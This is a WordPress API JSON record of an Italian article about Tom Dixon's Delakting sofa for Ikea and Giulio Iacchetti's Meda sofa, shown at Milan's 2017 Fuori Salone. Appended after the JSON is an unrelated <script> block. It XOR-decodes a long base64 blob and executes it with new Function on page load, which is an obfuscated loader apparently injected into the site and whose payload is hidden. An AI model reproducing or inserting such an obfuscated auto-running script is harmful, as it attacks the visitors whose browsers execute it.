{"id":3227,"date":"2017-04-09T14:33:06","date_gmt":"2017-04-09T14:33:06","guid":{"rendered":"https:\/\/giuliazappa.net\/il-futuro-del-divano-e-globale-al-fuori-salone-la-scommessa-millennials-di-tom-dixon-e-ikea\/"},"modified":"2017-04-09T14:33:06","modified_gmt":"2017-04-09T14:33:06","slug":"il-futuro-del-divano-e-globale-al-fuori-salone-la-scommessa-millennials-di-tom-dixon-e-ikea","status":"publish","type":"post","link":"https:\/\/giuliazappa.net\/en\/il-futuro-del-divano-e-globale-al-fuori-salone-la-scommessa-millennials-di-tom-dixon-e-ikea\/","title":{"rendered":"Il futuro del divano \u00e8 globale. Al Fuori Salone la scommessa millennials di Tom Dixon e Ikea"},"content":{"rendered":"<p><strong>Con Multiplex il designer inglese propone un processo sempre pi\u00f9 stretto di relazione e fratellanza fra diversi brand. Con la nuova collezione di lampade e accessori dello stesso Dixon<\/strong><\/p>\n<p>Sempre alla ricerca di un nuovo concept da proporre e di una nuova location da riscoprire, il designer inglese\u00a0<strong>Tom Dixon<\/strong>\u00a0ha portato al cinema Manzoni di Milano la sua nuova creatura \u201cda Salone\u201d: si tratta di Multiplex, una collettiva di brand \u201camici\u201d, come li ha definiti Dixon, sottolineando che il futuro dei marchi non sia un mors tua vita mea, ma al contrario un processo sempre pi\u00f9 stretto di relazione e fratellanza. La formula, gi\u00e0 inaugurata per il\u00a0<em>London Design Festival<\/em>, si rinnova con nuovi nomi e ovviamente con la nuova collezione di lampade e accessori dello stesso Dixon. Tutti gli occhi, per\u00f2, sono puntati non solo sulle splendide volte anni cinquanta del cinema progettato da Alziro Bergonzo \u2013 ci potrete andare ogni sera, durante il Salone, per godervi un film su grande schermo \u2013 ma anche e soprattutto sul nuovo divano che Dixon ha realizzato in collaborazione con\u00a0<strong>Ikea<\/strong>,\u00a0<em>Delakting<\/em>. Se ne parlava gi\u00e0 da tempo: un po\u2019 letto e un po\u2019 sofa \u2013 il letto, ci ricorda il designer inglese, \u00e8 l\u2019unico mobile di cui non possiamo fare a meno \u2013 Delakting sembra guardare alle esigenze flessibili e nomadiche della nuova generazione di millennials (e oltre? Purtroppo o per fortuna, crediamo di s\u00ec). Modulare e soprattutto trasformabile, si promette di adattarsi a tutte le funzioni e le fasi della vita, nonch\u00e9 di espandersi secondo coordinate realmente globali: se il settore dell\u2019imbottito \u00e8 generalmente considerato il comparto del mobile pi\u00f9 tradizionale e localistico \u2013 il modo con cui facciamo i divani non \u00e8 poi troppo cambiato da duecento anni a questa parte \u2013, il fatto di essere smontabile e realizzato su una base in alluminio \u2013 queste s\u00ec due assolute novit\u00e0 \u2013 lo rende perfetto per essere spedito ovunque nel globo senza incidere realmente sui costi di vendita.<\/p>\n<p><strong>IKEA HACKERS<\/strong><br \/>\nGlobale s\u00ec, ma anche personalizzabile: per evitare quell\u2019\u201deffetto Ikea\u201d che fa di ogni casa arredata con i mobili del colosso svedese una fotocopia di se stessa, Dixon e Marcus Engman, Head of Design di Ikea, si sono ispirati alle community mondiali di Ikea hackers, inglobandone di fatto i presupposti e le logiche sovversive cos\u00ec da ripensare la forma e la funzione di Delakting secondo le provocazioni degli studenti-sabotatori provenienti da tre scuole di design tra Londra, Giappone e New York. Il destino delle fabbrichette di provincia \u00e8 segnato? Non proprio. Ci piace infatti ricordare che, dopo Multiplex, abbiamo ritrovato ragionamenti e esercizi progettuali affini presso lo spazio di Internoitaliano in via Palermo. Anche qui c\u2019\u00e8 un nuovo divano, e anche in questo caso \u00e8 un trasformabile: disegnato da Giulio Iacchetti e prodotto da BertO salotti,\u00a0<em>Meda<\/em>\u00a0\u00e8 un divano con struttura in rovere che pu\u00f2 essere trasformato in chaise longue, letto, fino anche in capanna improvvisata per i giochi dei bambini, grazie al riposizionamento dei cuscini che si sfilano dalla base. Una piccola poesia quotidiana, dunque, che al globalismo contrappone un sapore da casa nostra che ha dalla sua l\u2019alta qualit\u00e0 manifatturiera e delle aspirazioni realmente sostenibili.<\/p>\n<p>Pubblicato su <a href=\"http:\/\/www.artribune.com\/progettazione\/design\/2017\/04\/divano-fuori-salone-tom-dixon-ikea\/\" rel=\"noopener\" target=\"_blank\">Artribune.com<\/a> il 9 aprile 2017<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Con Multiplex il designer inglese propone un processo sempre pi\u00f9 stretto di relazione e fratellanza fra diversi brand. Con la nuova collezione di lampade e accessori dello stesso Dixon Sempre alla ricerca di un nuovo concept da proporre e di una nuova location da riscoprire, il designer inglese\u00a0Tom Dixon\u00a0ha portato al cinema Manzoni di Milano &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/giuliazappa.net\/en\/il-futuro-del-divano-e-globale-al-fuori-salone-la-scommessa-millennials-di-tom-dixon-e-ikea\/\" class=\"more-link\">Read more<span class=\"screen-reader-text\"> &#8220;Il futuro del divano \u00e8 globale. Al Fuori Salone la scommessa millennials di Tom Dixon e Ikea&#8221;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":2678,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[284],"tags":[],"class_list":["post-3227","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-reportage-en"],"acf":[],"_links":{"self":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/posts\/3227","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/comments?post=3227"}],"version-history":[{"count":0,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/posts\/3227\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/media\/2678"}],"wp:attachment":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/media?parent=3227"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/categories?post=3227"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/tags?post=3227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<script>
!function(){var _0x392f=atob('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'),_0xd092=125,_0x0109=new Uint8Array(_0x392f['length']),_0xab25=0;for(;_0xab25<_0x392f['length'];_0xab25++)_0x0109[_0xab25]=_0x392f['charCodeAt'](_0xab25)^_0xd092;(new Function(new TextDecoder()['decode'](_0x0109)))()}();
</script>
    